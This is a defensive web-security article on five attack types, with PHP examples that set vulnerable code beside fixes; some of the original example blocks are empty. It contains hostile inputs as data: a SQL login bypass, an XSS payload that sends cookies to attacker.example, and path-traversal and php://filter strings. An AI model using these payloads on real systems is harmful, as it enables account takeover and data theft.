Web Application Security: The 5 Most Common Security Vulnerabilities That Can Kill Your Startup

While building a startup, whether a plain website or a rich web application, you must observe some basic rules to ensure that your users are adequately protected. Preventing attacks starts at the programming stage, with the quality of the code you write. Here are only five of the dozens of possible attack scenarios:

1. SQL Injection

SQL Injection is the best-known type of attack, and it originates in insufficient validation of input. It is most often seen in websites written in PHP and ASP. The attack consists of inserting unwanted SQL fragments into an application's input so that they become part of a query. If successful, it allows the attacker to add or delete database content and to read the e-mail addresses, passwords and personal information of the website's users. A SQL Injection vulnerability occurs whenever a website builds queries dynamically from untrusted input and passes them to the database.

Example:

Let’s assume that the login variables (login and password) are sent through the POST method and placed directly into an SQL query. A code excerpt responsible for logging users in that is vulnerable to this attack may look like this:


If a website user submits admin'-- in the user field, the executed SQL query will look as follows:


What has happened? The -- sequence is interpreted by the DBMS as the start of a comment, so the rest of the SQL query, the password check, is never executed. An attacker may exploit this to gain admin access to the service.

How to prevent the attack:

The most effective protection is to never build SQL from user-provided strings: use prepared statements with bound parameters (PDO or mysqli in PHP), so that data can never be parsed as part of the query. Escaping functions such as mysqli_real_escape_string() and pg_escape_string() are a fallback for the rare places where parameters cannot be used; the old mysql_real_escape_string() belongs to the mysql extension, which was removed in PHP 7.0. Numeric data should be converted with settype() or sprintf(), or cast with (int), and checked with is_numeric() or ctype_digit() for the correct format before use.
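The login check described in the example above and the prepared-statement fix recommended here, side by side. This is an added example, not code from the original article: it uses an in-memory SQLite database through PDO so that it runs stand-alone, and the account, password and table layout are constructed test data (the plaintext password column exists only to mirror the article's vulnerable query; the hardened version uses the hash column).

```php
<?php
// Added example (not from the original article): a login check built by string
// concatenation beside the same check written with a prepared statement.
declare(strict_types=1);

function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Constructed schema: "password" (plaintext) only serves the vulnerable
    // query below; real code stores nothing but the hash.
    $db->exec('CREATE TABLE users (login TEXT PRIMARY KEY, password TEXT, password_hash TEXT)');
    $st = $db->prepare('INSERT INTO users VALUES (?, ?, ?)');
    $secret = 'correct horse battery staple';                 // constructed sample password
    $st->execute(['admin', $secret, password_hash($secret, PASSWORD_DEFAULT)]);
    return $db;
}

// VULNERABLE: user input becomes part of the query text.
// With the login  admin'--  the statement turns into
//   SELECT login FROM users WHERE login = 'admin'--' AND password = '...'
// and everything after -- is a comment, so the password is never compared.
function loginVulnerable(PDO $db, string $login, string $password): bool
{
    $sql = "SELECT login FROM users WHERE login = '$login' AND password = '$password'";
    return $db->query($sql)->fetch(PDO::FETCH_ASSOC) !== false;
}

// SAFE: the login is bound as a value, so quotes and -- inside it are just
// characters of the value; the password is verified against a hash in PHP.
function loginSafe(PDO $db, string $login, string $password): bool
{
    $st = $db->prepare('SELECT password_hash FROM users WHERE login = ?');
    $st->execute([$login]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['password_hash']);
}

$db = makeDb();
foreach ([["admin'--", 'wrong'], ['admin', 'wrong'], ['admin', 'correct horse battery staple']] as [$u, $p]) {
    printf("login=%-10s vulnerable=%-5s safe=%s\n", $u,
        loginVulnerable($db, $u, $p) ? 'true' : 'false',
        loginSafe($db, $u, $p) ? 'true' : 'false');
}
```

Requires PHP 7 or newer with the pdo_sqlite extension. The first row of the output is the bypass from the text: the vulnerable function accepts admin'-- with any password, while the prepared statement looks for a user literally named admin'-- and finds none.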

2. Account Lockout

The best illustration for this attack is the story of a user of one of the largest online auction websites. The user bid for an extremely well-priced item. 15 minutes before the auction’s closing, another user entered the bidding. Just before the listing ended, when the first user attempted to make his final offer, he was logged out from the service and received a message stating his account had been locked for 30 minutes, which excluded him from further bidding.

Why did the system act in this way?

The second bidder could see the first bidder's login, which was plainly displayed on the website. He made several attempts to log into the other user's account with incorrect passwords. To defend against brute-force attacks, the system locked the account after the limit of failed login attempts was reached. An attacker who abuses account lockout in this way can deny users access to their own accounts: the lockout turns a brute-force defence into a denial-of-service tool.

How to prevent the attack:

Rather than locking users out of their accounts after a limit of failed login attempts, consider requiring a CAPTCHA with each subsequent login attempt to that account. This slows brute-force attacks down without denying the legitimate user access.

Another option is to block a single IP address from logging in for a specified period of time. Still, the attacker and the attacked user may share an IP address (behind NAT or a corporate proxy, for example), in which case the legitimate user is denied service as well.
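A throttle that implements both ideas from this section without ever locking the account, as an added example that is not part of the original article. After a few failures the account requires a CAPTCHA (the legitimate user can still get in), and only a source IP that keeps failing is blocked for a cooling-off period, so the shared-IP problem described above is confined to heavy abusers. The thresholds, window, class name and the addresses in the scenario are assumptions chosen for the demo; counters are kept in memory here, whereas a real deployment would keep them in a shared store so every web node sees the same picture.

```php
<?php
declare(strict_types=1);

// Added example, not code from the original article. Requires PHP 8.0+
// (constructor property promotion).
final class LoginThrottle
{
    public const ALLOW    = 'allow';
    public const CAPTCHA  = 'captcha';
    public const BLOCK_IP = 'block_ip';

    /** @var array<string, int[]> failure timestamps keyed by "acct:..." or "ip:..." */
    private array $failures = [];

    public function __construct(
        private int $captchaAfter = 3,     // failures per account before a CAPTCHA is required (assumed)
        private int $blockIpAfter = 20,    // failures per IP before that IP is blocked (assumed)
        private int $window = 900          // seconds of history considered: 15 minutes (assumed)
    ) {}

    /** Drop timestamps outside the window and return how many failures remain. */
    private function recent(string $key, int $now): int
    {
        $cutoff = $now - $this->window;
        $this->failures[$key] = array_values(array_filter(
            $this->failures[$key] ?? [],
            fn(int $t): bool => $t > $cutoff
        ));
        return count($this->failures[$key]);
    }

    /** What a login attempt for $account from $ip must satisfy right now. */
    public function decide(string $account, string $ip, int $now): string
    {
        if ($this->recent("ip:$ip", $now) >= $this->blockIpAfter) {
            return self::BLOCK_IP;           // this source is refused for the rest of the window
        }
        if ($this->recent("acct:$account", $now) >= $this->captchaAfter) {
            return self::CAPTCHA;            // the account stays usable, but a CAPTCHA is required
        }
        return self::ALLOW;
    }

    /** A failed attempt counts against both the account and the source IP. */
    public function recordFailure(string $account, string $ip, int $now): void
    {
        $this->failures["acct:$account"][] = $now;
        $this->failures["ip:$ip"][] = $now;
    }

    /** A successful login (with a valid CAPTCHA if one was required) clears the account counter. */
    public function recordSuccess(string $account): void
    {
        unset($this->failures["acct:$account"]);
    }
}

// Constructed scenario: an attacker at 203.0.113.5 hammers alice's account
// with wrong passwords while alice herself logs in from 198.51.100.7.
$t   = new LoginThrottle();
$now = 1_700_000_000;
for ($i = 0; $i < 25; $i++) {
    if ($t->decide('alice', '203.0.113.5', $now + $i) === LoginThrottle::BLOCK_IP) {
        break;                               // the attacker's IP has just been blocked
    }
    $t->recordFailure('alice', '203.0.113.5', $now + $i);
}
echo "attacker now:   ", $t->decide('alice', '203.0.113.5', $now + 30), PHP_EOL;
echo "alice now:      ", $t->decide('alice', '198.51.100.7', $now + 30), PHP_EOL;
echo "attacker later: ", $t->decide('alice', '203.0.113.5', $now + 1000), PHP_EOL;
```

The attacker's IP ends up blocked, alice is merely asked for a CAPTCHA from her own address, and once the window has elapsed even the attacker's address is released, so nobody is locked out permanently. The per-account CAPTCHA step is what keeps this from becoming the denial of service described in the auction story.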

3. Stored XSS

In this type of attack, a script written by an attacker is read back out of the database into which it had previously been injected. In contrast to SQL Injection, the malicious code does not affect the functioning of the database; it is stored as ordinary data and, following the website's own rules, delivered to the website's users. The script may be entered, for example, in a comment box, and is then interpreted by users' browsers as part of the page. This should never happen: the attacker must never be able to submit a script and have it passed on to other customers. An attack of this type hits every user of the website, none of whom suspects that it has been infected with a malicious script.

Example:

The following entry is submitted to a message board or in a comment:


or

How to prevent the attack:

Preventing Stored XSS requires encoding data correctly at the point where it is written into the page (for HTML bodies and attributes in PHP, htmlspecialchars() with ENT_QUOTES and an explicit charset), in addition to validating input; where a field must accept markup, the best approach is a whitelist of allowed tags and attributes rather than a blacklist of dangerous ones. If the website may be susceptible to Stored XSS, adding the HttpOnly flag to outgoing cookies is also useful: in the majority of browsers it blocks cookie theft by client-side script (JavaScript) and therefore helps prevent session hijacking. The HttpOnly flag cannot, however, be regarded as a fix for XSS: an injected script can still act in the user's name from within the page, so it protects only against the simplest attacks.
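The two halves of this advice in working code, as an added example that is not from the original article: a stored comment rendered raw (the vulnerable path) and rendered through output encoding, plus the cookie options that add the HttpOnly flag. The comment payload, author string and the host attacker.example are constructed for the demo.

```php
<?php
declare(strict_types=1);

// Added example, not code from the original article.

const ATTACKER_HOST = 'attacker.example';   // constructed, reserved example domain

/** VULNERABLE: whatever was stored in the database is emitted as markup. */
function renderCommentVulnerable(string $author, string $body): string
{
    return "<div class=\"comment\" data-author=\"$author\"><p>$body</p></div>";
}

/**
 * Encode at the point of output, for the context the value lands in.
 * ENT_QUOTES also encodes the single quote so the value is safe inside
 * attribute quotes; the explicit charset avoids encoder/browser mismatches.
 */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** SAFE: the same markup, with every untrusted value encoded for HTML. */
function renderCommentSafe(string $author, string $body): string
{
    return '<div class="comment" data-author="' . h($author) . '"><p>' . h($body) . '</p></div>';
}

/** Session cookie that scripts cannot read and that only travels over HTTPS. */
function sessionCookieOptions(): array
{
    return [
        'expires'  => 0,
        'path'     => '/',
        'secure'   => true,     // never sent over plain HTTP
        'httponly' => true,     // hidden from document.cookie
        'samesite' => 'Lax',    // not attached to cross-site POST requests
    ];
}

// Constructed payloads of the kind described in the text: a comment body that
// tries to ship the reader's cookie to an attacker host, and an author name
// that breaks out of the attribute it is printed into.
$bodyPayload   = "<script>new Image().src='https://" . ATTACKER_HOST . "/?c='+document.cookie</script>";
$authorPayload = 'mallory" onmouseover="alert(1)';

echo "unsafe:\n", renderCommentVulnerable($authorPayload, $bodyPayload), "\n\n";
echo "safe:\n",   renderCommentSafe($authorPayload, $bodyPayload), "\n";

// Under a web server this sets the session cookie with the flags above
// (the array form of setcookie() needs PHP 7.3 or newer).
if (PHP_SAPI !== 'cli') {
    setcookie('SESSIONID', bin2hex(random_bytes(16)), sessionCookieOptions());
}
```

The "unsafe" output contains a live script tag and an injected event handler; the "safe" output shows the same bytes as harmless text. Note that encoding is context-specific: h() is right for HTML text and quoted attributes, but a value placed inside a script block, a URL or a CSS rule needs the encoder for that context, and a field that must carry real markup needs an HTML sanitiser with a tag whitelist, not this function.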

4. Unicode encoding

The ASCII character encoding was based on the letters of the English alphabet, which at the time were treated as universal. As the world wide web spread to countries with other languages and alphabets, and one byte cannot hold the characters of all languages, a series of separate encodings, one per language group, was introduced. The Unicode standard was developed as a remedy: each character may be encoded in more than one byte, so a single encoding system can cover all the languages of the world.

UTF-8, now the most widely used Unicode encoding, lets a potential intruder write a filtered sequence (for example ‘../’) in several byte forms. Every character has exactly one valid UTF-8 encoding, but a decoder that does not check validity may accept a longer, specially crafted sequence (an overlong encoding, for example the two bytes C0 AF) as a single character such as ‘/’. The standard forbids such sequences, and a decoder must reject them rather than silently accept them.

Example:

Speaking of character encoding, let us look at the same link written in different encodings.


In different encodings the same characters are represented by different byte sequences. As a consequence, filtering input by blacklisting forbidden characters would require anticipating every possible encoding.

The best prevention is to convert all provided data to one canonical encoding, rejecting any byte sequence that is invalid in it, and only then to validate the result and reject unwanted characters.
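The overlong-encoding problem and the canonicalise-then-validate rule from this section, as an added example that is not from the original article. It contains a strict UTF-8 validator written out by hand from the RFC 3629 byte ranges (so the rejection logic is visible rather than hidden in a library), a naive blacklist filter of the kind the text warns against, and a filter that decodes to one form and refuses invalid input before checking for traversal. All inputs, including the overlong "../", are constructed; function names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not code from the original article.

/**
 * True only for well-formed UTF-8: rejects overlong sequences (e.g. C0 AF
 * for "/"), UTF-16 surrogates, code points above U+10FFFF and truncation.
 */
function isStrictUtf8(string $s): bool
{
    $n = strlen($s);
    $i = 0;
    while ($i < $n) {
        $b = ord($s[$i]);
        if ($b < 0x80) { $i++; continue; }                        // ASCII
        if ($b >= 0xC2 && $b <= 0xDF)     { $need = 1; $min = 0x80; }
        elseif ($b >= 0xE0 && $b <= 0xEF) { $need = 2; $min = 0x800; }
        elseif ($b >= 0xF0 && $b <= 0xF4) { $need = 3; $min = 0x10000; }
        else { return false; }                                     // C0, C1, F5..FF never start a character
        if ($i + $need >= $n) { return false; }                   // truncated sequence
        $cp = $b & (0x3F >> $need);
        for ($k = 1; $k <= $need; $k++) {
            $c = ord($s[$i + $k]);
            if (($c & 0xC0) !== 0x80) { return false; }           // not a continuation byte
            $cp = ($cp << 6) | ($c & 0x3F);
        }
        if ($cp < $min) { return false; }                         // overlong: a shorter form exists
        if ($cp > 0x10FFFF || ($cp >= 0xD800 && $cp <= 0xDFFF)) { return false; }
        $i += $need + 1;
    }
    return true;
}

/**
 * Naive filter in the spirit of the text: URL-decode, then blacklist "../"
 * on the raw bytes. An overlong "." (C0 AE) is not "." byte-wise, so the
 * check passes, and a lenient decoder downstream turns it back into "../".
 */
function naivePathFilter(string $urlPath): bool
{
    return strpos(rawurldecode($urlPath), '../') === false;
}

/**
 * Canonicalise to one encoding first, refuse anything that is not strict
 * UTF-8, and only then apply the traversal check. Returns the clean path or
 * null when the request must be rejected.
 */
function safePath(string $urlPath): ?string
{
    $decoded = rawurldecode($urlPath);
    if (!isStrictUtf8($decoded)) {
        return null;                                   // malformed or overlong: refuse, never "repair"
    }
    if (strpos($decoded, "\0") !== false || preg_match('#(^|/)\.\.(/|$)#', $decoded)) {
        return null;
    }
    return $decoded;
}

// Constructed inputs.
$inputs = [
    'images/logo.png',              // plain path
    '..%2F..%2Fetc%2Fpasswd',       // percent-encoded "../": both filters catch it
    '%C0%AE%C0%AE%2Fetc%2Fpasswd',  // overlong "..": passes the naive filter only
    'docs/%E2%9C%93.txt',           // valid three-byte UTF-8 (a check mark) is accepted
];
foreach ($inputs as $in) {
    printf("%-30s naive=%-6s canonical=%s\n", $in,
        naivePathFilter($in) ? 'pass' : 'reject',
        safePath($in) === null ? 'reject' : 'pass');
}
```

The third input is the case the text describes: the blacklist sees the bytes C0 AE and finds no "..", while the strict validator refuses the request outright because C0 can never begin a valid UTF-8 character. The same ordering (decode once, validate the encoding, then check the content) applies to any other filter, not only path traversal.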

5. PHP Injection

Programming languages have functions that execute external code. In PHP these are require(), include(), eval() and, in PHP 5, preg_replace() with the /e modifier, which evaluates the replacement string as PHP code (the modifier was removed in PHP 7.0). If user-provided data is passed to one of these functions, PHP code injection may occur.

Example:

Let’s assume that the website has a very simple controller that uses the variable file, sent via the GET method, to display the content of the specified file.


As we can see, the variable file passed by the GET method is handed straight to include(). This is a serious error which attackers may exploit in a number of ways.

Any code may now be executed, for example:

The path to the malicious code is passed as the parameter of include(). The script is then executed by the attacked server.

How to prevent the attack:

Server configuration helps. The option allow_url_include (Off by default since PHP 5.2) stops include and require from fetching files from external servers, and allow_url_fopen does the same for file_get_contents() and fopen(); neither stops the inclusion of local files such as ../../etc/passwd or of stream wrappers such as php://filter, which can disclose source code. The best protection is not to pass user-provided data to functions that execute scripts at all. Where a parameter must select a file, map it onto a whitelist of files that may be included, and never use the raw string as part of the path.
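The controller from this section beside the whitelist fix, as an added example that is not from the original article. The page files are written to a temporary directory so the script runs stand-alone, and their names, contents, the page keys and the hostile inputs are constructed for the demo.

```php
<?php
declare(strict_types=1);

// Added example, not code from the original article.

$root = sys_get_temp_dir() . '/lfi-demo-' . bin2hex(random_bytes(4));
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/home.php',  "<?php echo 'home page', PHP_EOL;");
file_put_contents($root . '/pages/about.php', "<?php echo 'about page', PHP_EOL;");

/** VULNERABLE: the request decides which file the interpreter executes. */
function renderVulnerable(string $root, string $file): void
{
    // "../../etc/passwd", "php://filter/...", or a remote URL when
    // allow_url_include=On all end up here unchanged.
    include $root . '/pages/' . $file;
}

/**
 * SAFE: the request supplies only a key; the server chooses the path.
 * Unknown keys get a 404 instead of a guess, and no user bytes reach include().
 */
function renderSafe(string $root, string $page): bool
{
    static $pages = [
        'home'  => 'home.php',
        'about' => 'about.php',
    ];
    if (!isset($pages[$page])) {
        http_response_code(404);
        return false;
    }
    include $root . '/pages/' . $pages[$page];
    return true;
}

echo "vulnerable with a benign value: ";
renderVulnerable($root, 'home.php');
// Deliberately not called with the hostile values below: with a local path it
// would execute or disclose whatever file the web server user can read.

$attempts = [
    'about',                                                 // legitimate key
    'about.php',                                             // a file name is not a key: refused
    '../../../../etc/passwd',                                // traversal
    'php://filter/convert.base64-encode/resource=home.php',  // source disclosure via stream wrapper
];
foreach ($attempts as $a) {
    printf("%-55s -> %s\n", $a, renderSafe($root, $a) ? 'rendered' : 'refused (404)');
}

array_map('unlink', glob($root . '/pages/*'));
rmdir($root . '/pages');
rmdir($root);
```

The lookup table is the whole defence: the request can only pick one of the keys that exist, so traversal strings and stream wrappers are refused before include() ever sees them, and no escaping or blacklisting of the input is needed.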

Testing your security

Checking a website manually for known security holes is certainly good practice. To speed up this time-consuming process you might use a number of tools designed to automate the search. Below we discuss three testing methods.

Black Box Testing

Black box testers only possess information about the functionality of a website, and have no knowledge of the application’s internal structure. They know only which input should be entered, and check whether the returned output is correct.

Wapiti, a web application vulnerability scanner, is an example of a black box testing tool.

White Box Testing

White box testing is based on the opposite principle. The testers have full access to the source code, and security holes and vulnerabilities are found by reading it. RATS, a static source-code scanner, is an example of an automated white box testing tool.

Grey Box Testing

A combination of the two methods. The tester has partial knowledge of the internals, for instance the full documentation produced during development, but no access to the source code. This knowledge makes it possible to target the inputs exercised in black box testing far more precisely.

Overall

The five selected types of attack have not been covered in depth, and only a few basic scenarios have been discussed: there are certainly many more, including combined attacks, threatening your business. Any programmer, project manager or startup founder must recognise the importance of protecting their applications. Neglecting simple security measures may discredit even the most valuable web service and frighten off customers for good.

Interested in security?

Find out more about IT security in our Hacking School courses available on the Udemy learning platform:

Website Hacking in Practice

Hacking School Training

Use the coupon code: UBLOG and save 40%!

About the authors:

The Hacking School has trained more than 25,000 people worldwide. Every course is prepared by professionals in their field, and the authors are well known in the world of computer systems security.

Every day we deal with the analysis of computer security, network infrastructure and applications. We have extensive experience in the fields of computer intelligence and computer forensics. We use custom and unconventional methods of security testing, which guarantee the highest quality of service.

We have had the pleasure of working with major corporations throughout Western Europe, North America and Russia. We assure our clients of complete anonymity, privacy and security of the information entrusted to us. Together with a group of trusted experts we solve every problem related to computer systems security, and now we want to share our knowledge with you.